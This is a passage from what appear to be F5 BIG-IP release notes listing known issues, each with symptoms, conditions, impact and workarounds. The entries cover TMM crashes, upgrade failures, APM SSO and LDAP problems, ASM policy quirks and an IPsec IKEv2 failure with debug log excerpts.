Node status returns to fqdn-up only after the next scheduled DNS query interval (e.g., 240 seconds).

Conditions:
-- BIG-IP devices configured with FQDN template nodes.
-- Performing config sync with the force-full-load-push option.

The issue occurs on the sync receiver only. It does not reproduce without force-full-load-push.

Impact:
Temporary service visibility issue:

FQDN nodes incorrectly display fqdn-checking / availability unknown until the next DNS resolution cycle.

This can last up to the configured FQDN interval (e.g., 4 minutes).

May cause confusion for administrators monitoring node status.

Workaround:
None


2037409-1 : Tmctl tables are corrupted for large cluster size and tmm memory shows 0

Links to More Info: BT2037409

Component: TMOS

Symptoms:
When a BIG-IP is deployed on a large cluster with 5 or more blades on VELOS chassis platforms, the following tables are shown as corrupted:
tmctl -d blade tmm/sdaglib_mirror_table
tmctl -d blade tmm/sdaglib_did_info
tmctl -d blade ipfix_destination_stats
tmctl -d blade tmm/sctp
tmctl -d blade tmm/lac

The command tmsh show sys tmm-info; shows 0 tmm memory
Memory (bytes)

tmsh show sys tmm-info

Conditions:
When using F5 VELOS Chassis platforms installed and deployed with BIG_IP with a number of blades 5 or above.

Impact:
Any data presented to user based on the impacted tables will be indicating incorrect data.

Workaround:
None


2035277-3 : Modifying virtual-address 'enabled' setting might lead to unpredictable virtual-server availability

Links to More Info: BT2035277

Component: Local Traffic Manager

Symptoms:
Virtual-server passes traffic when virtual-address is disabled.
The virtual-address 'enabled' setting is not always properly reflected on depending virtual-server configuration objects

Conditions:
-- Using traffic-matching-criteria.
-- Destination specified in traffic-matching-criteria list is the same as defined virtual-address.

remove the virtual server and re-add it or simply restart the TMM

Impact:
Virtual-server still passes traffic when virtual-address is disabled and inconsistent behavior is observed.

Workaround:
None


2035177-1 : Use of OCSP responder with SSL C3D enabled in virtual server may leak SSL handshake instances

Links to More Info: BT2035177

Component: Local Traffic Manager

Symptoms:
SSL C3D with OCSP responder may cause SSL handshake instances to be leaked because of MPI dropping replies due to traffic bursts.

Conditions:
Traffic flows through a virtual server with C3D enabled, utilizing an OCSP responder to validate the status of the client's certificate.

Impact:
TMM ssl_hs_m memory usage grows over time, eventually causing memory pressure, and potentially a traffic disruption due to TMM restart.

Workaround:
None


2035129-4 : The CMP stream communication between tmms on different blades might stall after a tmm memory exhaustion event

Links to More Info: BT2035129

Component: Local Traffic Manager

Symptoms:
Issues with ARP or NDP resolution. Intermittent issues with the tmm session table.

Conditions:
BIG-IP is running on a chassis platform
tmm has run out of memory at some point but was able to recover

Impact:
CMP communication is impacted which may affect the tmm session table, ARP and NDP resolution, intra-chassis mirroring among other things.

Workaround:
It is difficult to determine which tmm(s) on which slot(s) might have been affected by the issue. Either restart tmm on the blades that experienced a memory exhaustion event or restart tmm on each blade in the chassis.


2035005-2 : VMware Horizon applications launched via BIG-IP as VDI proxy ignore args parameter in vmware-view URI

Links to More Info: BT2035005

Component: Access Policy Manager

Symptoms:
Applications launched through BIG-IP virtual server start correctly, but the args parameter is dropped.

Example: Command Prompt opens but does not execute ipconfig when launched with args=%2Fk%20ipconfig.

When bypassing BIG-IP (direct VCS node access), the same URI executes the command successfully.

Applications without args (e.g., Calculator) work as expected both with and without BIG-IP.

Conditions:
VMware Horizon published applications behind BIG-IP APM.

Launching applications via vmware-view:// URI with args parameter.

Protocols tested: Blast, PCoIP.

Issue occurs consistently when BIG-IP virtual server FQDN is used.

Direct access to Horizon Connection Server (bypassing BIG-IP) does not exhibit the problem.

Impact:
User cannot deep-link into specific app states or pass runtime arguments to published applications through BIG-IP.

Breaks workflows relying on args, such as opening IBM Notes documents directly or running pre-defined commands in applications.

Causes functional discrepancy between direct Horizon access and BIG-IP proxied access, leading to user frustration and support escalations.

Workaround:
None


2034985 : Unable to forward NTLM SSO back-end cookies to front-end

Component: Access Policy Manager

Symptoms:
Unable to forward NTLM SSO back-end cookies to front-end.
NTLM has three HTTP round-trips and can set different sets of cookies in each trip. After successful NTLM SSO, APM does not forward some cookies from the back-end to the front-end.

Conditions:
-- NTLM SSO is configured.
-- The server side sends one or more 401 responses to the BIG-IP system during the transaction, followed by a 200 response.

Impact:
Cookies are not sent to the client side, and SSO negotiation fails.


2033781-1 : Memory allocation failed: can't allocate memory to extend db size

Links to More Info: BT2033781

Component: Local Traffic Manager

Symptoms:
When tmm cannot expand the eXtremeDB database, it logs an error in /var/log/tmm:

err tmm1[21087]: 01010004:3: Memory allocation failed: can't allocate memory to extend db size

Conditions:
-- BIG-IP in operation
-- A configuration change is made that causes tmm to allocate more memory to eXtremeDB. Examples include:
  - Adding a clientssl or serverssl profile
  - Modifying a datagroup
  - A bot defense sync occurs

Impact:
Tmm does not crash but the eXtremeDB state is inconsistent with other tmms and could lead to unpredictable behavior such as virtual servers not working, iRules failing to work, bot defense failing to work

Workaround:
None


2017105-2 : Disk partition /var full after quick config changes

Links to More Info: BT2017105

Component: Application Security Manager

Symptoms:
When a new configuration is applied, the previous data files are kept as long as they may be needed and also had a minimum age for deletion applied. When multiple config changes were made in quick succession this resulting in multiple generations that were under the minimum age for cleanup, and some duplicate data files that hadn't changed between generations. This can exhaust the available space in /var.

Conditions:
Many small config changes are applied in quick succession. This can occur during a version upgrade or EHF installation.

Impact:
Disk space was exhausted, leading to failure to apply configuration or configuration corruption.


2016613 : GTM link monitors using gateway-icmp may report "no reply from big3d"

Links to More Info: BT2016613

Component: Global Traffic Manager (DNS)

Symptoms:
After upgrading from a version lower than 17.5.1, GTM link monitors using gateway-icmp may report "no reply from big3d" and status may show Down.

Conditions:
- Upgrade from a version lower than 17.5.1
- GTM link monitors use gateway-icmp

Impact:
GTM link monitors using gateway-icmp may report "no reply from big3d" and status may show Down

Workaround:
None


2016465-1 : Policy auto merge does not work for Base64 Decoding

Links to More Info: BT2016465

Component: Application Security Manager

Symptoms:
If an entity (Parameters, Cookies, Headers) in two policies have differing values for how to handle Base64 values (enabled, disabled, required), policy diff does not merge the values correctly.

Conditions:
An entity (Parameters, Cookies, Headers) in two policies have differing values for how to handle Base64 values (enabled, disabled, required), policy diff does not merge the values correctly.

Impact:
Expected changes may not be made to the merged policy resulting in unexpected Base64 value handling.

Workaround:
The values can be changed manually through GUI or REST.


2015973-2 : Enabling tcp-ak-ts dos vector causes file transfer failure

Links to More Info: BT2015973

Component: Advanced Firewall Manager

Symptoms:
After upgrading, large file transfers to S3 endpoints start failing

Conditions:
-- Tcp-ack-ts with tscookie is enabled
-- You transfer a large file via the virtual server

Impact:
TLS connections to S3 endpoints are disrupted, resulting in stalled or failed connections

Workaround:
Disable the tscookie option in tcp-ack-ts


2014597-2 : Async session db ops are missing flow control

Links to More Info: BT2014597

Component: TMOS

Symptoms:
Tmm cores when
- Memory leakage from SSL handshakes piling up, due to mpi_data_queue getting filled fast and failing to trigger callbacks.
 
- Segmentation fault occurs due to a large delay in callbacks

Conditions:
- To many requests from one tmm thread to another tmm causes tmm_cmp_enqueue to drop replies as mpi_data_queue gets filled up.
- Longer delays in replies are causing drops, as the system is busy, or too many retries are causing the mpi_data_queue to fill up fast.

Impact:
TMM crashes


2014373-2 : Fix for TMM Core SIGSEGV in spva_gl_ddos_find_tuples Due to NULL Grey List Flood Entry

Links to More Info: BT2014373

Component: Advanced Firewall Manager

Symptoms:
TMM core analysis suggests that spva code received a FSD from HSB with type 14 (sPVA FSD). When the code was processing FSD, TMM crashed as the grey list flood entry was NULL. This entry was NULL on all TMM threads.

Conditions:
The issue occurs when sPVA code receives an FSD of type 14 from HSB, and during processing, the corresponding grey list flood entry is NULL across all TMM threads, causing a TMM crash.

Impact:
TMM crashed

Workaround:
None


2012801-2 : "parser parameters" is enabled even though json schema is attached to the profile

Links to More Info: BT2012801

Component: Application Security Manager

Symptoms:
"parser parameters" is enabled even though json schema is attached to the profile. The GUI shows the option as disabled and greyed out; however, internally it is enabled.

Conditions:
Unknown

Impact:
JSON is extracted and enforced as parameters because of the "parser parameters" setting being enabled. This results in unexpected enforcement even when a valid JSON body is sent.

Workaround:
Making and saving a spurious change to the profile corrects the unexpected state.


2012301-1 : Upgrade the certificate to be compatible with the new upgraded gson package

Component: TMOS

Symptoms:
After the Gson package upgrade to 2.10.1, we need to update the certificate in cacert so that the SSL handshake exception is not present, as the new Gson package needs an updated certificate for verification.

Conditions:
Where the Gson package is used.

Impact:
Fails all the related packages in the build

Workaround:
Update the cacert with the correct certificate


2011341 : The address list file fails to load during an SCF file merge

Links to More Info: BT2011341

Component: TMOS

Symptoms:
Getting the error while merging the shared-objects address-list using an SCF file after upgrading to V17.5.1

Syntax Error: "fw-ip-address-list" component cannot be loaded because it is not a valid component

Conditions:
1. Create an address list
2. Save the address list as scf file
3. Merge the saved scf file and configuration
load sys config merge file test.scf

Impact:
The saved scf address list file fails to load

Workaround:
None


2008633-1 : Active mode FTP using port 0 for data-channel connections

Links to More Info: BT2008633

Component: Local Traffic Manager

Symptoms:
- Infrequent FTP data-channel failure.
- Control-channel is terminated with ABOR due to data-channel failure.

Conditions:
- FTP profile configured with data-port 0 (any).
- Active mode FTP.
- Server using privileged port(s) (<1024).

Impact:
Failed FTP data connection.

Workaround:
If the server uses a known privileged port (e.g., 20), set this as the data-port in the FTP profile.
Alternatively, configure the server to use non-privileged port (>= 1024).


2008573-1 : Login/Logout expected/unexpected string has no length validation

Links to More Info: BT2008573

Component: Application Security Manager

Symptoms:
You can configure an inappropriately long string for the login/logout criteria.

Conditions:
Configuring the Login/Logout expected/unexpected string.

Impact:
Upon asm restarted bd goes into restart loop. ASM traffic disrupted while bd restarts.

Workaround:
None


2008185-2 : The vectors threshold mode changes from Fully Automatic to Manual post upgrade

Links to More Info: BT2008185

Component: Advanced Firewall Manager

Symptoms:
After upgrading BIG-IP from version 16.1.5.2 to 17.1.2.2, the DoS vector threshold mode for tcp-syn-flood unexpectedly changes from "fully automatic" to "manual."

Conditions:
Enable the vector eg: tcp-syn-flood in v16.1.5.2 with threshold mode as fully automatic, threshold set to infinite and bad actor enabled. upgrade to v17.1.2.2.

Device is running BIG-IP version 16.1.5.2 (or similar 16.x version) prior to upgrade.
The tcp-syn-flood DoS vector is configured with threshold-mode set to fully-automatic.
Additional vector settings include:
detection-threshold-pps infinite
bad-actor is enabled.
per-source-ip-detection-pps is set to 9000.
per-source-ip-limit-pps is set to 100000.

The device is upgraded from version 16.1.5.2 to 17.1.2.2.

Impact:
-- GUI inaccessibility, BIG-IP is in offline state.
-- The system does not use the intended DoS protection settings. This can lead to service disruption, as the device may not load the required configuration.

Workaround:
Manually revert the threshold mode to fully-automatic.
tmsh load sys config


2007705-1 : HSL can incorrectly handle pending TCP connections leading to a TMM crash

Links to More Info: BT2007705

Component: TMOS

Symptoms:
TMM core

Conditions:
A pool member is marked down or delete while there are TCP connection issues with some pool members

Impact:
TMM crash impacts the service.

Workaround:
None


2007429 : Captcha button label displays in lowercase

Links to More Info: BT2007429

Component: Application Security Manager

Symptoms:
The CAPTCHA challenge displays a "submit" button with lowercase text, which may not align with UI expectations.

Conditions:
-- CAPTCHA challenges triggered by bot defense or brute force protection modules.
-- Bot Defense with Captcha mitigation is attached to a virtual server
 OR
-- WAF policy with brute force using captcha mitigation is attached to a virtual server.

Impact:
Minor UI inconsistency that may affect user experience preferences.

Workaround:
None


1998985-1 : Displays "Page Unresponsive" error message when editing AD group resource with large AD group count

Links to More Info: BT1998985

Component: Access Policy Manager

Symptoms:
Page becomes unresponsive

Conditions:
AD Group Resource should be attached with AD server with Large AD Group Count

Impact:
AD Group Resource agent cannot be edited

Workaround:
Delete the existing AD Group Resource agent and recreate it by first adding the desired resources (e.g., VDI, RDP, Webtops, etc.) during the edit operation. After adding the resources, attach the AD server as the final step.


1993737-1 : [APM][SSO]TMM Core in the SSO decompress operation

Links to More Info: BT1993737

Component: Access Policy Manager

Symptoms:
The TMM core backtrace shows a SIGSEGV in saml_sso_from_assigned_resources_and_profile, specifically a memcmp() call with a NULL meta_data pointer.
The underlying issue appears to be a race condition or logic error where a decompress callback is triggered after the SSO state (metadata) has already been freed, possibly due to concurrent handling of decompress operations and redirect responses.

Conditions:
SAMl SSO is configured

Impact:
Traffic disrupted while tmm and apmd restarts.

Workaround:
None


1993081-3 : SNMP traps are not being generated for bigipExternalLinkDown (.1.3.6.1.4.1.3375.2.4.0.218) and bigipExternalLinkUp (.1.3.6.1.4.1.3375.2.4.0.219).

Links to More Info: BT1993081

Component: TMOS

Symptoms:
Two SNMP traps bigipExternalLinkDown (.1.3.6.1.4.1.3375.2.4.0.218) and bigipExternalLinkUp (.1.3.6.1.4.1.3375.2.4.0.219) were added as part of ID807957 fix. However, currently, these two traps are not being generated.

Instead of bigipExternalLinkDown or bigipExternalLinkUp trap, when alertd.nokia.linktraps db key and alertd.nokia.alarm db key is both set to disabled (default), bigipExternalLinkChange trap (.1.3.6.1.4.1.3375.2.4.0.37) is being generated upon link status change (up/down).

When alertd.nokia.linktraps db key and alertd.nokia.alarm db key is both set to enable, Nokia specific snmp traps (.1.3.6.1.4.1.94.7.1.4.2.1) is generated upon link status change (down/up) and Nokia Alarm database is correctly updated with those snmp traps. Fix for ID807957 is still valid here.

Conditions:
- Running software version that has fix for ID807957 (16.1.0 or later / 17.x).
- SNMP trap destination is configured and link status change happens.
- alertd.nokia.linktraps db key and alertd.nokia.alarm db key is both disabled (default value).

Impact:
BigipExternalLinkDown trap and bigipExternalLinkUp trap is not being generated.

Workaround:
None.


1992569-2 : Request body held despite "do nothing" content profile setting

Links to More Info: BT1992569

Component: Application Security Manager

Symptoms:
Requests configured with the "Do Nothing" content profile may still have their body held until fully received, rather than being streamed directly to the server.

Conditions:
ASM is configured with the "Do Nothing" option and large or slow requests are sent.

Impact:
May lead to increased latency or timeouts for server-side applications expecting real-time data delivery, and unnecessary resource usage due to repeated ingress event handling.

Workaround:
None


1991717 : Upgrade fails from 17.5.0 to 17.5.1 if a shared object list is configured with Geo or FQDN's

Links to More Info: BT1991717

Component: Advanced Firewall Manager

Symptoms:
- Upgrade fails from 17.5.0 to 17.5.1 if a shared object list is configured with Geo or FQDN addresses.

Conditions:
- AFM Provisioned on v17.5.0
- Configure a dns-resolver under global-fqdn-policy.
- Configure a shared object list with a Geo or FQDN address.
- Install 17.5.1 on a boot location.
- Upgrade to 17.5.1

Impact:
Upgrade fails from 17.5.0 to 17.5.1 with the following error:

Syntax Error:(/config/bigip_base.conf at line: 649) "geo" unknown property

Workaround:
- Identify the rules and the lists and comment them out of the bigip_base file that are involved in the firewall rules.
- Upgrade to 17.5.1 or load the config again.

or

1. Remove the shared objects address list from the AFM rules and then the shared objects address lists with Geo or FQDN addresses.
2. Once after an upgrade, add address list again to AFM rules and Geo or FQDN


1991485 : Re-adding a tunnel with the exact same name might result in tunnel ingress traffic getting dropped.

Links to More Info: BT1991485

Component: TMOS

Symptoms:
Re-adding a tunnel with the exact same name might result in tunnel ingress traffic getting dropped.

Conditions:
Deleting and re-adding a tunnel with exactly same name as the tunnel that was just deleted.

Impact:
Tunnel might no longer pass traffic indicating 'Incoming Discard' drops.

Workaround:
Use a different name for the tunnel.


1991297-1 : [APD][SAML-SSO]high memory due to SAML SSO leak

Links to More Info: BT1991297

Component: Access Policy Manager

Symptoms:
Tmm crashes due to out of memory while passing SAML-SSO traffic

Conditions:
SAML SSO configured with saml artifact sign.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1991289-2 : ECA always invokes the default access profile 'kerberos_auth_default'

Component: Access Policy Manager

Symptoms:
ECA always invokes the kerberos_auth_default profile, even when it’s known that the request will be denied later.

Conditions:
-- SSL Orchestrator Proxy configured with SWG-explicit NTLM ONLY Access Profile

Impact:
Increasing unnecessary load on apmd, which will cause a performance issue during peak time.

Workaround:
None


1991261-2 : AAA LDAP: priority group activation resets when updating configuration in APM

Links to More Info: BT1991261

Component: Access Policy Manager

Symptoms:
AAA LDAP pool-based configuration in APM resets the Priority Group Activation (PGA) setting to the default after any update to AAA LDAP configuration.

Manual changes to PGA (e.g., disabling it) are overwritten during AAA updates in the APM UI.

Conditions:
-- AAA LDAP is configured in APM with the "Use Pool" option enabled.
-- Priority Group Activation on the auto-generated pool is manually set to "Disabled" via Local Traffic > Pools.
-- Any subsequent update to the AAA LDAP configuration in APM resets the Priority Group Activation setting back to "Less than 1 Available Member(s)".

Impact:
-- Custom settings for Priority Group Activation are not persistent and are overwritten during APM updates.
-- Load balancing behavior may not work as intended if PGA is reset unexpectedly.

Workaround:
Manually update Priority Group Activation settings in the auto-generated pool via Local Traffic > Pools after each AAA LDAP configuration update in APM.
Disable Priority Group Activation immediately after updating any AAA LDAP configuration values in APM.


1991241-2 : ECA plugin unresponsive

Links to More Info: BT1991241

Component: Access Policy Manager

Symptoms:
ECA plugin becomes unresponsive and is stuck on a read call.

Conditions:
-- SSL Orchestrator Proxy configured with SWG-explicit NTLM ONLY Access Profile

Impact:
ECA plugin became unresponsive, leading to a performance degradation.

Workaround:
None


1991237-2 : Unable to configure number of apmd thread using tmsh command

Component: Access Policy Manager

Symptoms:
Unable to configure number of apmd thread using tmsh command.

Conditions:
-- SSL Orchestrator Proxy is configured with SWG-explicit NTLM ONLY Access Profile
-- Any access policy configured in APM.

Impact:
Unable to control the number of apmd threads using tmsh command.

Workaround:
None


1989133-1 : Unexpected blocking of valid login attempts after upgrade to version 17.5.0

Links to More Info: BT1989133

Component: Application Security Manager

Symptoms:
Users may experience blocking of legitimate login attempts due to incorrect classification of failed logins.

Conditions:
Occurs when brute force protection is enabled and login attempts are made to a configured login URL without authentication headers.

Impact:
Valid login attempts may be falsely flagged as brute force attacks, triggering enforcement actions such as CAPTCHA or blocking pages, potentially disrupting user access.

Workaround:
None


1989125-1 : TSval value of Ack packets sent by BIG-IP may roll back in time

Links to More Info: BT1989125

Component: Local Traffic Manager

Symptoms:
After BIG-IP replies to a SYN-ACK with one value of TSval in TCP timestamp, the next packet sent by BIG-IP might have a TSval that is behind. This results in some clients resetting the connection or timing out.

Conditions:
The syncookie mode protection has been activated due to a SYN flood.

Impact:
Connectivity issue

Workaround:
None


1989033-2 : IPsec IKEv2 tunnel may fail to initiate or respond due to ERR_PORT

Links to More Info: BT1989033

Component: TMOS

Symptoms:
In very rare circumstances the BIG-IP may fail to initiate or respond to an IKEv2 tunnel.

When debug2 is enabled, the following log messages in the tmm log indicates a potential match for this bug. ERR_PORT is a critical indicator of the failure condition.

<13> <date> <hostname> notice ike_connect/3154: @F: ike flow created 172.16.61.100:172.16.61.200 rd: 0 owner=0.2 me=0.2
<13> <date> <hostname> notice ike_connect/3218: @F: ISAKMP_CONN local=172.16.61.100:500 remote=172.16.61.200:500
<13> <date> <hostname> notice ike_proxy_connect/1510: @E: flow_connect() ERR ERR_PORT
<13> <date> <hostname> notice ike_connect/3241: @E: ERR ERR_PORT
<13> <date> <hostname> notice pfkey_isakmp_reconnect/5231: @E: can't create isakmp flow to 172.16.61.100:500 172.16.61.200:500 %0, err ERR_PORT.
<13> <date> <hostname> notice pfkey_isakmp_reconnect/5241: @E: ERR ERR_PORT

The ipsec.log will contain different messages.

ipsec.log - BIG-IP attempts to start the connection, the INTERNAL_ERR is a critical indicator:

<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: rcf_remote_cite: (remote why='@B:deepcopy:MAKE' me=0x4000c6cbaa08#4035 pa=2643 name='/Common/<ike peer name>' ip='<remote IP>[500]')
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INTERNAL_ERR]: ikev2_allocate_sa: ERR Invalid BIG-IP flow context for <local IP>[500]-><remote IP>[500] peer='/Common/<ike peer name>'
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_allocate_sa: @A: Insert ike_sa 0x4000c7aa2c88, SPI 1c96e4465b82fc39 0000000000000000 in list (peer='/Common/<ike peer name>')
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_state_transition: [ikev2_dh_generate] @I:ike_sa 0x4000c7aa2c88 SPI=1c96e4465b82fc39 0000000000000000 state IDLING -> DH_REQ
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_state_transition: [ikev2_dh_generate_callback] @I:ike_sa 0x4000c7aa2c88 SPI=1c96e4465b82fc39 0000000000000000 state DH_REQ -> DH_DONE
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_next_request_id: @A: send message (id 0) sa=0x4000c7aa2c88 (loc=<local IP>[500] rem=<remote IP>[500])
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_state_transition: [ikev2_set_state] @I:ike_sa 0x4000c7aa2c88 SPI=1c96e4465b82fc39 0000000000000000 state DH_DONE -> INI_IKE_SA_INIT_SENT
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] (req at='@M:PUSH:ikev2_send_request' SPI='1c96e4465b82fc39 0000000000000000' gen=0x1 MID=0 pkt=0x4000c7ec9558)
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] (payloads dir=SEND at=ikev2_send_request payl=0x4000c442ca88 len=432 crc=0x47699687
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] @ . (v2_head i_spi=0x1c96e4465b82fc39 r_spi=0x0000000000000000 next=33:PAYLOAD_SA
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] @ . . . ver=0x20 exch=34:IKE_SA_INIT flags=0x8:I-Q id=0 len=432 crc=0x47699687)
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] @ . (hd type=33:PAYLOAD_SA next=34:PAYLOAD_KE byte=0 len=48 off=0x1c)
...

ipsec.log - BIG-IP retransmits a few more times:

<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_retransmit: @M: retransmit 0x4000c7d77b78 pkt 0x4000c7ec9558 msg_id=0 req 0x4000c7d77b08 SPI 1c96e4465b82fc39 0000000000000000 count 0
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_retransmit: @M: retransmit 0x4000c7d77b78 pkt 0x4000c7ec9558 msg_id=0 req 0x4000c7d77b08 SPI 1c96e4465b82fc39 0000000000000000 count 1
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_retransmit: @M: retransmit 0x4000c7d77b78 pkt 0x4000c7ec9558 msg_id=0 req 0x4000c7d77b08 SPI 1c96e4465b82fc39 0000000000000000 count 2
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_retransmit: @M: retransmit 0x4000c7d77b78 pkt 0x4000c7ec9558 msg_id=0 req 0x4000c7d77b08 SPI 1c96e4465b82fc39 0000000000000000 count 3

ipsec.log - BIG-IP cancels the negotiation after a timeout:

<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_negotiation_timeout_callback: ikev2_negotiation_timeout_callback1 ike_sa rmconf : 3335236104
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_negotiation_timeout_callback: ikev2_negotiation_timeout_callback2 rmconf ikev2 : 3343372872
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_negotiation_timeout_callback: ikev2_negotiation_timeout_callback3 ikev2 plog : 0
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_negotiation_timeout_callback: negotiation timeout: ike_sa (ick=0x1c96e4465b82fc39, rck=0x0000000000000000)
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [PROTO_ERR]: __ikev2_abort: ike_sa=0x4000c7aa2c88 ABORT, ERR errno='110', SPI 1c96e4465b82fc39 0000000000000000
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_state_transition: [ikev2_set_state] @I:ike_sa 0x4000c7aa2c88 SPI=1c96e4465b82fc39 0000000000000000 state INI_IKE_SA_INIT_SENT -> DYING
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] (req at='@M:POP:ikev2_cancel_retransmit_req' SPI='1c96e4465b82fc39 0000000000000000' gen=0x1 MID=0 pkt=0x4000c7ec9558)
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: ikev2_state_transition: [ikev2_set_state] @I:ike_sa 0x4000c7aa2c88 SPI=1c96e4465b82fc39 0000000000000000 state DYING -> DEAD
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [DEBUG]: ikev2_ha_send_sa_delete: high availability (HA) SA is already deleted from Session DB
<date> <hostname> info tmm[1501]: 017c0000 [0.2] [IKE] [INFO]: rcf_remote_cite: (remote why='@B:clean:FREE' me=0x4000c6cbaa08#4035 pa=2643 name='/Common/<ike peer name>' ip='<remote IP>[500]')

Conditions:
-- IPsec IKEv2
-- Tunnel may be newly configured
-- BIG-IP does not transmit or respond to any packets related to the configured tunnel.

Impact:
When this occurs, the tunnel will be down permanently.

Workaround:
If this is a High Availability (HA) peer and the config is sync'd with the Standby, failing over to the Standby may bring the tunnel up.

However, a second failover (fail back to the original high availability (HA) device) will lead to the tunnel down again. The original device once Active again, is still in the same failure mode.

One workaround is to failover, check the tunnel is up and then reboot or 'bigstart restart' the failing Standby device.

After that, the IKE SA should appear correctly mirrored on the Standby, use 'tmsh show net ipsec ike-sa' and check there is an SA with the peer's IP.

The second workaround is to delete all IPsec config objects, self IP and route-domain associated with the tunnel. In the case where the IPsec config, self IPs and routes exist entirely in route-domain 0 this is not a reasonable solution and rebooting is the most sensible recovery step.


1988981-2 : TMM crashes after detaching and reattaching a DoS profile on the DNS virtual server

Links to More Info: BT1988981

Component: Local Traffic Manager

Symptoms:
-- TMM stops functioning and crashes.
-- A core dump file is generated on the system.

Conditions:
During an ongoing DDoS attack, the DoS profile associated with a virtual server is detached, modified, and then reattached.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Avoid detaching, modifying, or reattaching the DoS profile to the virtual server while the BIG-IP is actively detecting or mitigating a DDoS attack, if possible.


1987361-2 : APMD file descriptor exhaustion when LDAP operational timeout is set to 180 seconds

Links to More Info: BT1987361

Component: Access Policy Manager

Symptoms:
You may observe below string in /var/log/apm*

"Too many open files"
"threads 560, running 560"

Conditions:
NTLM config with LDAP pool configuration.

Impact:
Unable to process APM traffic

Workaround:
Restart APMD process


1987309-2 : Bigd may get stuck in legacy mode

Links to More Info: BT1987309

Component: Local Traffic Manager

Symptoms:
SSL raises SSL_F_SSL3_GET_RECORD : SSL_R_WRONG_VERSION_NUMBER, hence bigd is stuck in legacy mode.

Conditions:
-- Server supports version TLSv1.2 and above.
-- bigd is configured to monitor the server with SSL.
-- The monitor flips into legacy mode.

Impact:
Bigd is stuck in legacy mode.

Workaround:
None


1983553-1 : Unable to load config after upgrading to v17.5.x with the Syntax Error: "tcp-ack-flood" unknown property

Links to More Info: BT1983553

Component: Advanced Firewall Manager

Symptoms:
After upgrading a BIG-IP AFM device from version 16.1.5.1 to 17.5.0, the device fails to come online.

Syntax Error:(/config/bigip.conf at line: 2737) "tcp-ack-flood" unknown property

Conditions:
Network vectors can be Mitigate state. Once dynamic signature detection is enabled, the load fails after upgrade to v17.5.0.

Impact:
The device fails to come online. This means the system is not operational which is in offline state.

Workaround:
-- Manually remove the duplicate state entry in bigip.conf.
-- Perform "tmsh load sys config verify" or reboot


1983145-1 : Memory Corruption due to xnet-DPDK

Links to More Info: BT1983145

Component: TMOS

Symptoms:
TMM crashes due to data corruption caused by xnet-DPDK. This can occur after upgrading from version 17.5.0 to version 17.5.1.

Conditions:
1) Using xnet-DPDK driver
2) DPDK v20.11 is being used (BIG-IP v17.5.x or higher)

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1983029-2 : IPS Upgrade: err mcpd[5374]: 01070734:3: Configuration error: DB validation exception, unique constraint violation on table

Links to More Info: BT1983029

Component: Protocol Inspection

Symptoms:
Err mcpd[5374]: 01070734:3: Configuration error: DB validation exception, unique constraint violation on table (ips_inspection_sig) object ID (/Common/linux_kernel_messenger_v2_c_segment_length_signedness_error_cve_2023_44466_1). A duplicate value was received for a non-primary key unique index field. DB exception text (Cannot update_indexes/checkpoint DB object, class:ips_inspection_sig status:13)

Conditions:
Upgrade bigip15.1.x to 17.1.x, the AFM Protocol Security was installed with PI update file pi_updates_15.1.0-20230301.1045.im

Impact:
IM package installation fails.

Workaround:
This is not a workaround, but rather a cautionary note to consider before performing an upgrade.

1. Deploy a newer version of PI update file prior to the upgrade
Ex: pi_updates_15.1.0-20230301.1045.im to pi_updates_15.1.0-20250324.1115 or Latest.

2. Then proceed with an upgrade to v17.1.2.1.

Workaround - 2
==========
1. Create ucs
2. Modify bigip.conf file in ucs using https://my.f5.com/manage/s/article/K13830181
3. Remove below signature's lines >> Re-packaged as ucs
   microsoft_windows_dns_server_integer_overflow_1
4. Load sys config default
4. Load the modified ucs
5. Deploy newer IM package.


1982937-1 : InTune MDM endpoint compliance intermittently fails despite being compliant

Links to More Info: BT1982937

Component: Access Policy Manager

Symptoms:
Compliant devices are shown as non-compliant

Conditions:
MDM Intune mdm check is used

Impact:
Access policy is denied even for compliant devices

Workaround:
None


1980649-2 : High CPU usage by bd

Links to More Info: BT1980649

Component: Application Security Manager

Symptoms:
High CPU usage by bd

Conditions:
-- ASM provisioned and in use
-- A specific condition leads BD to unnecessary high CPU

Impact:
High CPU

Workaround:
None


1980645-2 : Bypass APM for Horizon Blast/PcoIP connection for internal users

Links to More Info: BT1980645

Component: Access Policy Manager

Symptoms:
Need a method to bypass APM for Horizon Blast connection for internal users using some configuration option in VPE.

Conditions:
1. VMware VDI is configured in APM
2. Internal and external users traffic is separated before reaching this Virtual Server.

Impact:
Internal user VMware horizon desktop/app traffic always goes through the Virtual Server though it can be bypassed after Authentication.

Workaround:
None


